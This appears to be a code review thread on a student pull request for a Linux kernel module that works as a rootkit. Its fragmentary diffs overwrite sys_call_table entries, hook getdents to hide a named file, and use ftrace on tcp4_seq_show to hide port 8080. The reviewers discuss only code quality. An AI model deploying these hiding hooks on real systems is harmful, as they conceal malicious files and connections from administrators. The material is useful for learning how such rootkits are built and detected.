### PR TITLE
Q3 dev

### PR DESCRIPTION
**Pull request by kobybs**

### CODE REVIEW

File: hellomod.c [hunk 1]
```diff
@@ -0,0 +1,65 @@
...
+#include "hook_functions/getdents.c"
+
+static struct ftrace_hook tcp_seq_show_fhook = {
+    .hook_func = hook_tcp4_seq_show,
+    .orig_func_pointer = (void**)&org_tcp4_seq_show,
+};
+
+static struct sys_hook sys_hooks[] = {
+    {
+        .orig_func_pointer = (void**)&original_getdents,
```
Comment (maykog) [inline hellomod.c:45]: can't you just assign `NULL` to `orig_func_pointer`? Don't you override it later?

File: syshook_utils.c [hunk 2]
```diff
@@ -0,0 +1,64 @@
...
+
+    res = set_page_rw((unsigned long)p_sys_call_table);
+    if (res != 0){
+        printk("failed to set write permissions for systable");
+        return -1;
+    }
+
+    for (i = 0; i < 1; i++) {
+        *((unsigned long*) hooks[i].orig_func_pointer) = (unsigned long) p_sys_call_table[hooks[i].sys_entry];
+        p_sys_call_table[hooks[i].sys_entry] = (void*)hooks[0].hook_func;
```
Comment (maykog) [inline syshook_utils.c]: why `[0]`?

Comment (maykog) [reply syshook_utils.c]: what if `hooks` contain more than 1 hook?

File: syshook_utils.c [hunk 3]
```diff
@@ -0,0 +1,64 @@
...
+        return -1;
+    }
+
+    res = set_page_rw((unsigned long)p_sys_call_table);
+    if (res != 0){
+        printk("failed to set write permissions for systable");
+        return -1;
+    }
+
+    for (i = 0; i < 1; i++) {
```
Comment (maykog) [inline syshook_utils.c]: if your condition is `i < 1` you don't need a loop.

Support more than 1 hook

File: syshook_utils.c [hunk 4]
```diff
@@ -0,0 +1,64 @@
...
+{
+    int i;
+    unsigned long **p_sys_call_table = (void *) kallsyms_lookup_name("sys_call_table");
+
+    if(!p_sys_call_table){
+        printk("failed to get sys_call_table addres");
+        return -1;
+    }
+
+    for (i = 0; i < 1; i++) {
```
Comment (maykog) [inline syshook_utils.c]: same as https://github.com/kobybs/hw/pull/3/files#r748758814

File: syshook_utils.c [hunk 5]
```diff
@@ -0,0 +1,64 @@
+struct sys_hook {
```
Comment (maykog) [inline syshook_utils.c]: consider moving it to `syshook_utils.h`

File: hook_functions/tcp_seq_show.c [hunk 6]
```diff
@@ -0,0 +1,12 @@
+asmlinkage int (*org_tcp4_seq_show) (struct seq_file *seq, void *v);
+
+static asmlinkage int hook_tcp4_seq_show(struct seq_file *seq, void *v)
+{
+    struct sock *sk = v;
+
+    if (sk != SEQ_START_TOKEN && sk->sk_num == HIDDEN_PORT)
```
Comment (maykog) [inline hook_functions/tcp_seq_show.c:11]: add a comment explaining what exactly you are hiding here

File: hellomod.c [hunk 7]
```diff
@@ -0,0 +1,65 @@
...
+};
+
+int init_module(void)
+{
+    int res = 0;
+
+    res = set_sys_hooks(sys_hooks);
+    if (res != 0){
+        printk("failed to set system hooks");
+    }
```
Comment (maykog) [inline hellomod.c:59]: so if `set_sys_hooks` fails, you wish to continue running as usual?

File: hellomod.c [hunk 8]
```diff
@@ -0,0 +1,65 @@
...
+#include <linux/types.h>
+#include <linux/proc_fs.h>
+#include <linux/ftrace.h>
+#include <linux/socket.h>
+#include <net/sock.h>
+#include <linux/trace.h>
+#include <linux/seq_file.h>
+
+#define HIDDEN_PORT 8080
+#define HIDDEN_FILE_NAME "myfile"
```
Comment (maykog) [inline hellomod.c:27]: so are you hiding every file in the system that's named `myfile`?

File: hook_functions/getdents.c [hunk 9]
```diff
@@ -0,0 +1,45 @@
+
+struct linux_dirent {
```
Comment (maykog) [inline hook_functions/getdents.c]: isn't it already defined in the kernel source?

File: hook_functions/getdents.c [hunk 10]
```diff
@@ -0,0 +1,45 @@
...
+
+asmlinkage int (*original_getdents) (unsigned int fd, struct linux_dirent* dirp, unsigned int count);
+
+asmlinkage int sys_getdents_hook(unsigned int fd, struct linux_dirent* dirp, unsigned int count)
+{
+        int nread;
+        struct linux_dirent *d;
+        int bpos = 0;
+        int rem;
+        char file_name[256] = {0};
```
Comment (maykog) [inline hook_functions/getdents.c]: why `256`?

Try creating a file that it's name length is `>256` and see what happens :)

File: hook_functions/getdents.c [hunk 11]
```diff
@@ -0,0 +1,45 @@
...
+        struct linux_dirent copied;
+        char* tempbuf;
+
+        nread = original_getdents(fd, dirp, count);
+
+        for (bpos = 0; bpos < nread;) {
```
Comment (maykog) [inline hook_functions/getdents.c]: add comments to this code part, there are many magic numbers here (24, 256) and kind of complicated logic.

File: hook_functions/getdents.c [hunk 12]
```diff
@@ -0,0 +1,45 @@
...
+            d = (struct linux_dirent *) ((char*)dirp + bpos);
+            strncpy_from_user(file_name, d->d_name, 256);
+
+            copy_from_user(&copied, d, 24);
+
+            if (strcmp(file_name, HIDDEN_FILE_NAME) == 0){
+                rem = count - (bpos + copied.d_reclen);
+
+                tempbuf = kmalloc(sizeof(char) * count, GFP_KERNEL);
```
Comment (maykog) [inline hook_functions/getdents.c]: I believe that `kmalloc`, `copy_from_user`, and the other function could fail :)

File: ftrace_utils.c [hunk 13]
```diff
@@ -0,0 +1,70 @@
...
+}
+
+static int undo_tcp_hook(struct ftrace_hook* hook){
+    unregister_ftrace_function(&hook->ops);
+    ftrace_set_filter_ip(&hook->ops, *((unsigned long*) hook->orig_func_pointer), 1, 0);
+    
+    return 0;
+}
+
+static int set_tcp_hook(char* name, struct ftrace_hook* hook)
```
Comment (maykog) [inline ftrace_utils.c]: so you can't use this function for `udp`? What's the difference if your answer is yes?

File: ftrace_utils.c [hunk 14]
```diff
@@ -0,0 +1,70 @@
...
+{
+    int res;
+    
+    // set ops fields
+    hook->ops.func = ftrace_callback;
+    hook->ops.flags = FTRACE_OPS_FL_SAVE_REGS
```
Comment (maykog) [inline ftrace_utils.c]: why specifically these flags?

File: ftrace_utils.c [hunk 15]
```diff
@@ -0,0 +1,70 @@
...
+    // which hook function should be currently called. this is done with 'container_of', a macro
+    // that gets a pointer to a member of a struct, and returns a pointer to matching struct.
+    struct ftrace_hook *hook = container_of(ops, struct ftrace_hook, ops);
+    if (!within_module(parent_ip, THIS_MODULE))
+        regs->ip = (unsigned long) hook->hook_func;
+}
+
+static int undo_tcp_hook(struct ftrace_hook* hook){
+    unregister_ftrace_function(&hook->ops);
+    ftrace_set_filter_ip(&hook->ops, *((unsigned long*) hook->orig_func_pointer), 1, 0);
```
Comment (maykog) [inline ftrace_utils.c]: magic numbers - why 1,0?

File: syshook_utils.c [hunk 16]
```diff
@@ -0,0 +1,64 @@
...
+    void* hook_func;
+    int sys_entry;
+};
+
+int set_page_rw(unsigned long addr)
+{
+    unsigned int level;
+    pte_t *pte = lookup_address(addr, &level);
+    if (pte->pte &~ _PAGE_RW) pte->pte |= _PAGE_RW;
+    return 0;
```
Comment (maykog) [inline syshook_utils.c]: seems like this function always succeeds, so change it to `void set_page_rw...`

Same goes with `set_page_ro` function

**Comment by maykog** [comment]
You've 14 commits here, and most of them are just fixups/refactor.

1. Read about `git rebase --autosquash`, `git commit --fixup` and merge all the fixups to their relevant commit.
2. Reorder and organize the commits. Use indicative commit messages

File: hellomod.c (hunk 1 above)
Comment (kobybs) [reply hellomod.c:45]: Not exactly, orig_func_pointer is a **pointer to a function pointer**. initially 'original_getdents' points to nothing.
While installing the hook I set 'original_getdents' to point on the original function:
`*((unsigned long*) hooks[i].orig_func_pointer) = (unsigned long) p_sys_call_table[hooks[i].sys_entry];`

So when I call original_getdents from inside getdents_hook its already initialized.

File: syshook_utils.c (hunk 5 above)
Comment (kobybs) [reply syshook_utils.c]: Correct me if i'm wrong, but this struct is indeed under syshook_utils.

File: hook_functions/getdents.c (hunk 10 above)
Comment (kobybs) [reply hook_functions/getdents.c]: file_name includes only the file's name not the entire path, as defined in [limits.h](https://github.com/torvalds/linux/blob/master/include/uapi/linux/limits.h)
`#define NAME_MAX         255`
what am I missing?

File: hook_functions/getdents.c (hunk 9 above)
Comment (kobybs) [reply hook_functions/getdents.c]: Actually it is only defined inside fs/readdir.c([as seen here](https://elixir.bootlin.com/linux/latest/A/ident/linux_dirent)), so I think it is not includable. it's also declared inside syscalls.h as incomplet type.

File: ftrace_utils.c (hunk 14 above)
Comment (kobybs) [reply ftrace_utils.c]: FTRACE_OPS_FL_SAVE_REGS - makes the callback regs pointer to point on the actuall reg values. this is needed if we wish to read/modify the reg values.
FTRACE_OPS_FL_IPMODIFY - makes the regs->ip modifiable, so we can override the return address from the ftrace callback with our hook function address.

File: syshook_utils.c (hunk 2 above)
Comment (kobybs) [reply syshook_utils.c]: that was a typo, now it's indeed possible to install many hooks.

File: hellomod.c (hunk 8 above)
Comment (kobybs) [reply hellomod.c:27]: now you can also set FILE_DIR

File: syshook_utils.c (hunk 5 above)
Comment (maykog) [reply syshook_utils.c]: Yep, but inside a .c file

File: ftrace_utils.c (hunk 14 above)
Comment (maykog) [reply ftrace_utils.c]: Write exactly it in a comment

File: syshook_utils.c (hunk 3 above)
Comment (kobybs) [reply syshook_utils.c]: done

File: syshook_utils.c (hunk 4 above)
Comment (kobybs) [reply syshook_utils.c]: done

File: syshook_utils.c (hunk 5 above)
Comment (kobybs) [reply syshook_utils.c]: moved to syshook_utils.h

File: hook_functions/tcp_seq_show.c (hunk 6 above)
Comment (kobybs) [reply hook_functions/tcp_seq_show.c:11]: done

File: hellomod.c (hunk 7 above)
Comment (kobybs) [reply hellomod.c:59]: nope, done.

File: hook_functions/getdents.c (hunk 11 above)
Comment (kobybs) [reply hook_functions/getdents.c]: done

File: hook_functions/getdents.c (hunk 12 above)
Comment (kobybs) [reply hook_functions/getdents.c]: done

File: ftrace_utils.c (hunk 13 above)
Comment (kobybs) [reply ftrace_utils.c]: It actually can be used to any function, just an old name i forgot to change. done.

File: ftrace_utils.c (hunk 15 above)
Comment (kobybs) [reply ftrace_utils.c]: done

File: syshook_utils.c (hunk 16 above)
Comment (kobybs) [reply syshook_utils.c]: done

File: ftrace_utils.c (hunk 14 above)
Comment (kobybs) [reply ftrace_utils.c]: done

File: hook_functions/getdents.c (hunk 9 above)
Comment (azisso) [reply hook_functions/getdents.c]: image

File: hook_functions/getdents.c [hunk 17]
```diff
@@ -0,0 +1,91 @@
...
+           off_t          d_off;
+           unsigned short d_reclen;
+           char           d_name[];
+       };
+
+asmlinkage int (*original_getdents) (unsigned int fd, struct linux_dirent* dirp, unsigned int count);
+
+
+static int remove_dirent_entry(int bytes_read, struct linux_dirent* dirp, unsigned int count, char* name_to_remove){
+    int bpos = 0;
```
Comment (azisso) [inline hook_functions/getdents.c]: Why do you initialize only some of the variables?

File: hook_functions/getdents.c [hunk 18]
```diff
@@ -0,0 +1,91 @@
...
+    int rem;
+    char file_name[NAME_MAX] = {0};
+    struct linux_dirent copied;
+    char* tempbuf;
+    int nread = bytes_read;
+    struct linux_dirent *d;
+
+    for (bpos = 0; bpos < nread;) {
```
Comment (azisso) [inline hook_functions/getdents.c]: Feels more like a `while`

**Pull request closed without merging**